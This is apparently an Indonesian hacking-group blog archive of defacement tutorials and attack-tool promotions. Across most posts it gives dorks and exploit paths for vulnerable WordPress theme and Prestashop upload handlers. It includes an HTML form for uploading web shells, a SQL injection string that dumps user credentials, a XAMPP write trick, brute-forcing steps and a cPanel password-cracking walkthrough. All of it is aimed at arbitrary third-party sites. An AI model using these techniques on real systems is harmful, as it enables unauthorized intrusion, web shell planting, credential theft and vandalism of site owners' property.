Showing posts with label Deface. Show all posts
Showing posts with label Deface. Show all posts

Wednesday, 20 December 2017

Com_Fabrik Auto Exploiter Web Based

Hae gaes,
Kali ini gua bakal share tools yang lagi viral akhir-akhir ini, yaitu tools Com_Fabrik Auto Exploiter. namun kali ini bukan lah yang harus di jalankan di terminal, akan tetapi yang sudah berbentuk web based. Tools ini adalah karya UstadCage_48 hasil recode dari tools IndoXploit.



Seperti itu tampilannya.

Nah sebelum kalian download scriptnya, alangkah baik nya kalo kalian baca aturan pakainya terlebih dahulu :v. hehe bukan aturan pakai sih, kayak resep dokter ja awokwokwok :v.

Cara pakainya,
1. kalian upload script Auto Exploiternya di Cpanel dlu atau di localhost (yang udah enable CURL sama udah pake PHP 7 ea)
2. Upload juga Script deface kalian. (satu folder dengan script Auto Exploiternya).
3. Edit Script Auto Exploiternya (di bagian
private $file dan public $hacker), sesuaikan dengan nama script deface dan Nickname kalian.
4. Save, lalu jalankan :)

Itu lah cara pakainya :v.

Untuk kalian yang menginginkan scriptnya, silahkan scroll kebawah. gua udah sediakan link download scriptnya :v.


Oke sekian postingan kali ini, jangan lupa buat terus kunjungi blog ini.

Greetz :
UstadCage_48 - IndoXploit Coders Team

Wednesday, 22 November 2017

Cyber Attack System 1.2.1 Darknime

Oke Gaes, balik lagi ma gua 4LV1N_404 wkwkwk. sorry kalo jarang update. kalian tau lah, di dunia nyata gua juga juga punya kesibukan dan ditambah tugas sekolah yang lumayan numpuk. kok malah curhat gua :v wkwkwk. Kali ini gua bakalan share lagi tools dari Yukinoshita47, yaitu Cyber Attack System 1.2.1 Darknime. ini adalah CMS Exploiter hasil penyempurnaan dari CMS Exploiter sebelumnya yaitu Project NekoGirl.







penampakan login CMS seperti diatas.

Username Default : yukinoshita47
Password Default : gsh1337

Fitur dari Cyber Attack System 1.2.1 yaitu :

Attack And Exploitation 
  • CSRF x1
  • CSRF x2
  • FatCat SQLi
  • XSSer

Vulnerability Scanner and Info Gathering
  • Bing IP Grabber
  • DOM!N@TOR Network Tools
  • Shellshock Scanner
  • Web Vulnerability scanner

Tool And Exploiter CMS Lokal (Indonesia)
  • Lokomedia Auto SQLi
  • Lokomedia Admin Finder
  • POPOJI CMS Register

Tool And Exploter CMS WordPress
  • Wordpress Tevolution Dorker
  • Wordpress Tevolution Mass Exploit
  • Wordpress U-Deesign Mass Exploit
  • Wordpress NativeChurch LFI Scanner
  • Wordpress Bruteforce

Tools And Exploiter CMS Joomla
  • Joomla Com_User Scanner
  • Joomla Get Modules Info
  • Joomla JCE Exploit

Tool And Exploiter Other CMS
  • Magento Add Admin
  • Auto Plupload
  • Drupal Core 7 Exploit
  • Massn Revslider
  • WHMCMS Auto Exploit
  • HTTPAttactIIS
  • PHP CGI Argument Injection Remote Exploit 

Encryption And Hash Cracking
Encryption Pack
  • Base 64 Decode
  • Encoder-Decoder X'Inject
Hash And Password Crack
  • Link Hashkiller
  • MD5 Online

Tracking And Other Stiff
  • Link WHOIS
  • Link IP Tracking
  • Link Shodan HQ
  • Link 1337 day
  • Link Exploit-DB

Maintenance Access
Shell Acces Scanner
-Pasir Merah Shell Checker ( menurut Yukinoshita47, tools ini sebaiknya dihapus karena tidak terlalu penting dan ada logger di dalamnya).

Oke itu aja fiturnya, ini adalah project OpenSource jadi bagi kalian yang mau recode silahkan. akan tetapi jangan lupa mencantumkan sumbernya " Yukinoshita47 - Garuda Security Hacker". yang mengklaim tool ini sebagai karyanya siap-siap ajalah wkwkwkwk. itulah sedikit pesan dari Yukinoshita47.

Bagi kalian yang penasaran dan mau mencoba CMS Exploit ini silahkan, link saya sediakan dibawah ini.

Oke sekian dulu postingan kali ini, semoga klean ga bosan buat jalan2 ke blog ini.

Greetz : Yukinoshita47 and All Members Garuda Security Hacker

Wednesday, 18 October 2017

Pentest Tools Auto Installer

Hae Gaes,
Kali ini gua 4LV1N_404 bakal share tools karya Yukinoshita47, tool kali ini bernama Pentest Tools Auto Installer. nah denger nama toolnya aja keren kan. yuk diintip toolsnya :v.

Pentest Tools Auto Installer memiliki fitur yang lumayan gaes :
  • Nmap [Network Scanner]
  • ZenMap [Nmap GUI Version]
  • Wireshark [Network Sniffer]
  • W3af [Web Vulnerability Scanner]
  • Nikto [Web Vulnerability Scanner]
  • Whatweb [Web Vulnerability Scanner]
  • John [Password Cracker]
  • PDF-Crack [PDF Password Cracker]
  • FCrackZip [ZIP Password Cracker]
  • Ophcrack [Password Cracker]
  • Volatility [Digital Forensic]
  • Digital Forensic Framework  [Digital Forensic]
  • GHex [Digital Forensic]
  • Aircrack-Ng [Wifi Audit]
  • Ettercap [Network Audit]
  • Yetsinia [Network Audit]
  • Packet Snifer / Spoofing [Network Audit]
  • WafW00f [Web Application Firewall Audit]
  • SSLyze [SSL Audit]
  • Droopescan [Wordpress, Joomla, And Other CMS Auditing]
  • SQLMap [Automate SQL Injection Audit]
  • SSLScan [SSL Audit]
  • Hydra [Password Checker]
  • Dmitry [Intelleigence Gathering]
  • HAPV [HTTP Anti Virus Proxy]
  • Krdc [Windows Remote Desktop Connection Client]
  • Medusa [Password Cracker]

Fiturnya gimana? lumayan bikin kalian penasarankan wkwkwk. bagi yang mau link github ada dibawah Bosque.

Screenshot :





Untuk Link Githubnya : Touch Me !!!


Oke, itulah tools baru dari Yukinoshita47, semoga bermanfaat bagi kita semua :D.

Greetz : Yukinoshita47 - Snooze - _Tuan2Fay_ - E7B_404 - Mr Engkus ST. MT - Cr4bbyP4tty - Loyo-ID - Fazlast - Anazvr - And All Members Garuda Security Hacker

terimakasih.

Saturday, 30 September 2017

LazyWpScan by Yukinoshita47

Oke Guys :v
Kali ini gua bakal share lagi karya dari seorang leader Garuda Security Hacker yang berkode nama Yukinoshita47. nah tool kali ini yaitu LazyWpScan. Baru denger dari namanya, pasti kalian langsung mau coba kan :v. gua tau kalo kalian itu pemalas awowkwkwk :v.



Fungsi dari tool ini sangat lah bagus buat kalian yang PEMALAS :v wkwkwk. tinggal kalian masukan url lalu tunggu tool ini scan, nanti bakal muncul usernamenya, nah kalian tinggal brute tuh menggunakan wordlist andalan kalian. tools karya Yukinoshita47 memang mantap dah.

Penampakan :





bagi kalian yang mau coba bisa langsung mengunjungi Github Yukinoshita47. link udah gua tambahin dibawah.


Link Github

Link Video


oke, sekian postingan kali ini, apabila ada yang mau ditanyakan tentang toolsnya, bisa bertanya sama Yukinoshita47 ea :v soalnya dia yang punya tools.


Greetz : Yukinoshita47 and All Members of Garuda Security Hacker

Sunday, 17 September 2017

The LazySQLMap - Tools SQLMap untuk kaum pemalas.

Hae Gaess...
Kali ini gua mau share tools karya Yukinoshita47 lagi :v. nah tool ini adalah tool yang mungkin sangat dinantikan oleh defacer yang pemalas wkwkwkw. Nama Toolsnya yaitu The LazySQLMap. agak lucu sih, kata pak Yukinoshita47, tools ini dibuat untuk member Garuda Security Hacker yang pemalas wwkwkwkwk.

Penampakannya :



Nah itulah penampakan toolsnya. bagi kalian yang ingin mencoba tools ini, silahkan buka Github Yukinoshita47 atau link yang sudah gua sediain dibawah.
Klik Disini

Nah sekian Postingan Kali ini, Terimakasih pak Yukinosita47 udah ngijinin buat share toolsnya :*

Sumber : Garuda Security Hacker

The Yuki Chan - Auto Pentest Tools

Oke Gaeesss .. :v
Sorry gua jarang update tutorialnya, dikarenakan lagi Prakerin wkkwkwkwk, jadi waktu buat ngeblog lumayan berkurang. Namun kali ini gua bakal share tools yang sangat lumayan bagi seorang pentester.

Screenshotnya seperti dibawah:



Nama toolnya itu di Judul :v. The Yuki Chan - Auto Pentest Tool. nah dari judul nya aja udah keren banget kan :v. auto auto gitu wkwkwkwk. Nah, tools ini adalah karya seorang Leader dari tim Garuda Security Hacker, yaitu bapak Yukinoshita47. Nah tools ini sangat lah berguna bagi kalian yang agak pemalas wkwkwk. karena tool ini adalah tool auto pentest, jadi udah otomatis wkwkwk.

Fitur dari Tools ini adalah :

  • Automated
  • Intel-Gathering
  • Security Auditing
  • OSINT
  • Tracking
  • System Enumeration
  • Fuzzing
  • CMS Editing
  • SSL Security Auditing
  • And Off course this tool designed for pentest


Modules yang ada dalam tools :

  • Whois domain analyzer
  • NSLookup
  • Nmap
  • The Harvester
  • Metagoofil
  • DNSRecon
  • Sublist3r
  • WafW00f
  • WAFNinja
  • XSS Scanner
  • Spaghetti
  • WPScanner
  • WPScan
  • WPSeku
  • Droopescan (Vulnerable scanner WP, Joomla, Drupal, dll.)
  • SSL Scan
  • SSLyze
  • A2SV
  • Dirseacrh
Nah lumayankan nih tools, emang bagus nih karya Yukinoshita47. bagi yang masih penasaran, silahkan kunjungi Github Yukinoshita47 aja.

Oke sekian postingan kali ini, Terima Kasih buat pak Yukinoshita47 yang udah ngasih ijin buat post tool dia :v.

Sumber : Garuda Security Hacker

Sunday, 27 August 2017

Nama Tempat Archive yang biasa digunakan Defacer

Hae gaes..
lama gua ga update nih blog :v wkwkwk. dikarenakan lagi sibuk PKL, jadi disempet2in lah :v. Kali ini gua mau share Nama tempat archive atau biasa disebut Mirror yang biasa digunakan oleh para defacer di Indonesia :v.

Tanpa basa-basi aja, karena kalo udah basi kagak enak, wkwkwk. langsung aja yak :v.

1.  Zone-H.org



Zone-H mungkin udah ga asing lagi ditelinga para defacer, baik itu dari luar negeri maupun dari Indonesia sendiri. Zone-H sengaja gua tulis nomor 1 karena di Zone-H agak susah nyubmitnya wkwkw. disana kalo emang gak ke deface pasti ga OK (Error).

2. Mirror-H.org


Mirror-H ini mungkin tempat archive buat orang Turki, karena bahasa di tampilannya menggunakan bahasa Turkish. Mirror-H mungkin mirror yang satu ini jarang kalian dengar. emang sih menurut gua, Defacer indonesia lebih banyak yang memilih Zone-H sama Defacer.id.

3. Defacer.id 



Defacer.id adalah tempat archive dari Indonesia. Defacer.Id didirikan oleh RismanID. akan tetapi pada tahun 2016, Defacer.id sempat ditutup atau bisa dibilang vakum. namun sudah di buka kembali, akan tetapi bukan RismanID lagi yang memegang kendali defacer.id.

Oke mungkin ini saja yang bisa w share buat kali ini wkwkwk.
Terima Kasih


Greetz : All Members Garuda Security Hacker

Sunday, 20 August 2017

Tutorial Deface Metode XAMPP Local Write Acces

Hai Gaess,,,
Balik lagi dengan postingan yang bisa dibilang tidak berfaedah ini :). kali ini gua bakal share tutorial Deface Metode XAMPP Local Write Access. btw Proof (POC) yang satu ini gua dapat dari Cr4byP4tty :* . Metode ini mungkin adalah metode yang sangat simple. dan Ijo di Defacer.id dan OK juga di Zone-H wkwkwkwk.



Seperti biasanya, siapkan Alat tempurnya :v

1. Laptop/PC
2. Internet
3. Niat
4. Dork : inurl:/XAMPP/index.php
               inurl:/security/index.php
               (Kembangin kakak :v)
5. Kesabaran
6. Sabun (Sunnah).

Oke langsung saja ke tutornya masbro :v

Pertama, lakukan dorking seperti biasanya. lalu pilih site target yang kalian inginkan :). perhatikan gambar dibawah :v


nah setelah, dorking pilih salah satu webnya :v


setelah dapat webnya, masukin /lang.php?Hacked_By_NickKalian . contoh: site.com/xampp/lang.php?Hacked_By_4LV1N_404 . setelah itu enter :v


nah, nanti akan muncul seperti gambar yang diatas, kadang juga blank sih. setelah itu, aksesnya di site.com/xampp/lang.tmp


dan Taraaa :v . udah selesai. simple sangadkan. Proof ini saya dapat dari Cr4byP4tty. sekian dari gua.
Terima Kasih.

Greetz : Yukinoshita 47 | _Tuan2Fay_ | Snooze | OutrageousEngkus TM_404 | E7B_404 | LuckNut |XM404RS! | ShadowHearts | CyberGhost.17 | Lyonc | EvilClown | Sector V2 | Mr.Spongebob | D34D_SL33P | .Luciferz | MR.Blank007 | Mr.Buggers | DarkTerrorizt | Mafia Boy | Fazlast | Mr.Secretz | Cr4byP4tty | Mr.HzA404EsL | P34CEB0Y | Mr_Viruzer#29 | 4LV1N_404 | Mr.Okoy48 | Loyo-ID | And All Member of Garuda Security Hacker

Saturday, 15 April 2017

Tutorial Deface WP Orange Shell Upload.

Hae Guys :D
Jumpa lagi kite :v. Kali ini saya akan share tutorial Deface WP Orange :D. btw, ini mungkin teknik lama, tapi gapapa lah :D. oke, langsung saja kita ke tutornye :v



Dork : inurl:/wp-content/themes/kernel-theme/
           inurl:/wp-content/themes/bordeaux-theme/
           inurl:/wp-content/themes/bulteno-theme/
           inurl:/wp-content/themes/rayoflight-theme/

Exploit : /wp-content/themes/nama-temanya/functions/upload-handler.php

Pertama, Dorking dulu :D


Pilih gambar, lalu klik visit page, kemudian tambahin exploitnya.
Contoh : site.com/wp-content/themes/kernel-theme/functions/upload-handler.php
apabila Vuln, akan muncul tulisan "error".


Selanjutnya, copy URLnya lalu pastekan ke CSRF dengan Post "orange_themes". apabila berhasil mengupload, akan muncul nama file yang kamu upload. dan apabila muncul tulisan no php, coba kamu upload yang berekstensi html.


Untuk Akses shellnya : site.com/wp-content/uploads/tahun/bulan/namafile

Gimana tutorialnya, gampangkan :D. jangan pernah menyerah sebelum mencoba kawan :D
Keep Crootz :D. eh  ngomong-ngomong , ane diajarin metode ini sama Berandal :v

Thanks to : Berandal | All Members Owl Squad | XaiSyndicate | JancokSec | Sanjungan Jiwa | Garuda Security Hacker.

Monday, 27 March 2017

Tutorial Crack Cpanel Suatu Website.

Dan lagi :D, gua gak bakal bosan share tutorial disini :D
dan kali ini tutorialnya adalah Tutorial Crack CPanel Suatu Website :D.
Sebenarnya, ini sama halnya kalian nyolong CPanel orang :v wkwkwk. oke sebelum mulai tutorialnya, kalian harus persiapkan bahannya :D

Bahan-bahannya :
1. Shell Backdoor yang sudah ketanam ( IndoXploit Shell ).
2. Internet yang stabil :D
3. sabun :v (Wajib hukumnya :v)

oke kalau semua bahannya udah siap mari kita mulai :v

Disini saya menggunakan Shell IndoXploit :D 
Pertama, akses shell backdoor yang sudah kalian tanam di web. lalu klik config.
lalu klik "Done"



Tunggu beberapa saat, nanti akan muncul config dari web.seperti gambar dibawah.


Setelah muncul confignya, klik CPanel Crack :D. nanti akan muncul user dan password. apabila tidak ada user dan password yang muncul, itu berarti CPanel webnya tidak bisa di Crack.


Klik Crack. dan tunggu beberapa saat. nanti akan muncul username dan password CPanel yang sudah di Crack. Saran saya, gunakan internet yang stabil :D


dan Taraaa... :D User dan Pass CPanelnya sudah kita dapatkan. tinggal login ke CPanelnya :D. untuk login cpanelnya, site.com/cpanel

Oke sekian Tutorial Crack Cpanel nya, semoga bermanfaat :D.
Terima Kasih.


Saturday, 25 March 2017

Tutorial Deface Prestashop VTEM Skitter Arbitrary File Upload

what's up gaess ... :v
Tutorial kali ini adalah Deface Prestashop VTEM Skitter Arbitrary File Upload. namanya panjang amat yah :D wkwkwkwk. langsung saja ikuti tutoriallnya dibawah ini .



Bahan :
Dork : inurl:/modules/vtemskitter/
           inurl:/modules/vtemskitter/slides/

Exploit : /modules/vtemskitter/uploadimage.php

CSRF : Touch Me Senpai :*

Pertama lu dorking dulu di google (image ya :v)






Pilih targetnya sesuka hatimu :v wkwkw. lalu view image, seperti gambar dibawah ini.


Masukkan Exploitnya, contoh : site.co.li/modules/vtimskitter/uploadimage.php
apabila vuln, maka akan muncul tulisan "error" seperti gambar dibawah ini.





Selanjutnya buka csrf yg saya kasih tadi. kemudian copy url dan masukkan ke kolom target dengan postname "userfile". apabila sukses, maka akan muncul nama file yang diupload.

dan untuk akses shellnya, site.co.li/modules/path/namashell.php


nah, gampangkan :D. yang susah kalau kalian cepat menyerah, hehe. sekian Tutorial Deface Prestashop VTEM Skitter Arbitrary File Upload. Terima Kasih

Keep Crootz... :v

~ 4LV1N_404

Friday, 24 March 2017

Tutorial Deface Wordpress Themes Radial


Hai GAess :D Smoga baik-baik saja dan gak bosan liat tutorial blog ini :D
Kali ini kita akan membahas Tutorial Deface Wordpress Themes Radial. Wordpress lagi :v.


Langsung saja persiapkan bahan-bahannya.


Dork : inurl:/wp-content/themes/radial-theme/

Exploit : /wp-content/themes/radial-theme/functions/upload-handler.php

CSRF : Klik Disini save as html.

Pertama, Dorking dlu. (images)



lalu visit. kemudian masukkan exploitnya
contoh : site.com/wp-content/themes/radial-theme/functions/upload-handler.php dan apabila vuln, maka akan muncul tulisan "error" seperti gambar dibawah.



Kemudian, Copy Url dan pastekan pada bagian target di CSRF yg saya kasih tadi.


untuk mengupload shell, shell nya harus di bypass jadi shell.phtml
apabila muncul tulisan "error" lagi, berarti gagal mengupload. apabila muncul nama file yang diupload berarti sukses mengupload filenya. disini saya mengupload file berekstensi .html


dan untuk mengakses filenya site.com/wp-content/uploads/tahun/bulan/namafile.

Sekian Tutorial Deface Wordpress Themes Radial


Thanks to. ./cR00T.


Sumber : Abnormal007

Thursday, 23 March 2017

Tutorial Deface Wordpress Themes U-Design

Whats Up Guyss .... :D
Kali ini gua 4LV1N_404 mau share tutorial Deface Wordpress Themes U-Design. oke kita langsung ke tutorialnya :D

Bahan :
Dork :
  •     inurl:/wp-content/themes/u-design/
  •     inurl:/wp-content/themes/u-design/sliders/ 
Exploit :
  /wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php

CSRF DISINI

Tutorialnya hampir sama seperti deface themes qualifire.
pertama lakukan dorking (google image).

masukkan exploit.
contoh : site.com/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php



apabila kosong atau tampilannya menjadi blank berarti site nya vuln.
copykan url ke CSRF yang saya kasih tadi dan masukkan ke kolom target dengan postfilenya "Filedata". lalu klik kunci site.


apabila muncul angka 1, kemungkinan anda berhasil mengupload shell.


akses shellnya di : site.com/namashellkalian.php

Sekian tutorial Deface Wordpress Themes U-Design. Terima Kasih

Tuesday, 21 March 2017

Deface Dengan Responsive Prestashop 1.6 File Arbitrary File Upload

Hai,,, Para Defacer :D
Gua gak bakal bosen kasih tutorial defacenya :D wkwkwk. Kali ini tentang Deface Dengan Responsive Prestashop 1.6 Arbitrary  File Upload. Nama nya aja panjang banget :v wwkwkwkk.
Oke kita langsung mulai aja tutorialnya

Sama Seperti biasa :D
Dork : - inurl:/modules/columnadverts/
            - inurl:/modules/homepageadvertise/
            - inurl:/modules/productpageadverts/
            - inurl:/modules/simpleslideshow/
            - inurl:/themes/warehouse/
            ( Use Your Brain :* )

Lakukan Dorking :D sama seperti biasanya. Apabila web vuln, maka akan seperti gambar dibawah :).


Exploit : - /modules/columnadverts/uploadimage.php
               - /modules/homepageadvertise/uploadimage.php
               - /modules/productpageadverts/uploadimage.php
               - /modules/simpleslideshow/uploadimage.php

Untuk CSRF nya :
<form action="TARGET/modules/module name/uploadimage.php" enctype="multipart/form-data" method="POST">
<input name="userfile" type="file" /><button>Upload</button>
</form>

apabila muncul "success:nama.php" itu berarti shell berhasil dipload. untuk akses shellnya,
site.com/modules/nama modulnya/slides/namashell.php

Sekian Post tentang Deface Dengan Responsive Prestashop 1.6 Arbitrary File Upload
Terima Kasih.

Monday, 20 March 2017

Deface SQL Lokomedia

Tutorial Deface SQL Lokomedia.
Hello...
Kali ini saya akan memberikan tutorial Deface SQL Lokomedia. keren kan :D
oke tanpa basa basi, langsung saja ikuti tutorial nya :D

Dork : inurl:statis-1-profil.html
           inurl:statis-1-pengantar.html
           inurl:statis-1 ext:html "Developed by" 
  ( Kembangin lagi dorknya biar dapat yang vulnerable dan yg masih perawan wkwkwk :v )

Exploit : 'union select /*!50000Concat*/(username,0x20,password)+from+users--+--


Untuk Lebih Jelasnya ikuti tutorial nya dibawah ini


Sekian tutorial Deface SQL Lokomedia, mohon maaf apabila ada kesalahan. 
Terima Kasih.

Sunday, 19 March 2017

Tutorial Deface Wordpress Themes Qualifire

Hay guys...
Kembali lagi saya akan memberikan tutorial Deface Wordpress Themes Qualifire.
Seperti biasanya, yang harus dipersiapkan yaitu :



Dork : - inurl:/wp-content/themes/qualifire/
           - inurl:/wp-content/themes/qualifire/sliders site:uk
            ( uk bisa diganti dengan nama domain yang lain )

Exploit : /wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php

CSRF : Touch Me*

oke langsung saja ikuti tutorialnya :D
Pertama, Dorking di google (image).


Kemudian pilih gambar > visit page


Kemudian masukan exploitnya, contoh site.com/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php


apabila tampilannya menjadi kosong atau blank berarti site nya vuln.


kemudian buka CSRF yang tadi diatas, dan pastekan urlnya dikolom target, dan postname nya Filedata. kemudian kunci target. dan pilih shell yang ingin anda upload dan klik upload shell.
Apabila muncul angka satu, kemungkinan shell anda berhasil diupload


Untuk Akses shell nya : site.com/namashell.php

Oke sekian tutorial Deface Wordpress Themes Qualifire, apabila masih ada yang kurang jelas silahkan berkomentar.

Tutorial Deface Wordpress Bruteforce

Hai Guys...
Kali ini saya akan share tutorial Deface Wordpress Brute Force :D.
Baru dengernya aja keren bangetkan hehehe..
Teknik ini biasa digunakan oleh para defacer yang sudah pro :)




Ikutin tutorialnya :
Dork : - inurl:/wp-login.php
       - inurl:/wp-login.php action=register
 ( Kembangin sendiri lah :v )

Tools BruteForcenya. Disini
Setelah download toolsnya, extract filenya. Kemudian Copy ke C:\

Kemudian cari targetnya, dan masuk ke halaman loginnya dlu site.com/wp-login.php ,
dikolom username isi dengan admin dan dikolom password isi sesuka hatimu :D, lalu enter.
Jika muncul Tulisan "The Password you entered for the username admin is incorret. Lost Your password?"
itu berarti username dari targetnya adalah "admin".

Dan jalankan tool yang sudah kamu download tadi.
Buka Command Prompt > Ketikkan "Cd /" (tanpa kutip) > WPForce.exe



Sekarang masukkan "WPForce.exe -url=site.com -user=admin -pass=wordlist.txt -threads=10" , kemudian tekan enter



tunggu proses scannya selesai, biasanya emang agak lama :v . boleh smbil nonton NeKopoi :v



Jika Proses scannya selesai maka akan muncul "GAME OVER" dan akan keliatan username sama passwordnya :D
sekarang tinggal login. dan keep Cr00tzz ... :D

Sekian Tutorial Deface Wordpress BruteForce.

Saturday, 18 March 2017

Tutorial Deface Array Type files[]

Tutorial Deface Array type files[]
Hai guys,
ini postingan pertama di blog ini, yaitu tutorial deface array type file[]. oke, tanpa basa-basi lagi langsung saja ikuti tutorialnya :D



Pertama Dorking dlu :D (Dorking image)
Dork : inurl:/server/php/ ext:jpg

lalu pilih gambarnya, kemudian visit page.


lalu view souce dengan cara kilik kanan>view page source atau ctrl+u atau dengan menambahkan "view-source:" dibelakang url.



Kemudian tekan ctrl+f , dan ketik server/php/


 klik url nya atau copy, dan visit. akan muncul seperti gambar dibawah.


Setelah itu, hapus setelah /server/php/.
apabila muncul seperti gambar dibawah, berarti sitenya vuln.


Selanjutnya, copykan URL ke CSRF online, dengan type files[]. apabila berhasil upload shellnya akan muncul seperti gambar dibawah.

CSRF Online


Akses shell? site.com/server/php/files/namashell kalian.


dan Crootzz.... :v

Oke sekian tutorial tentang deface Array type files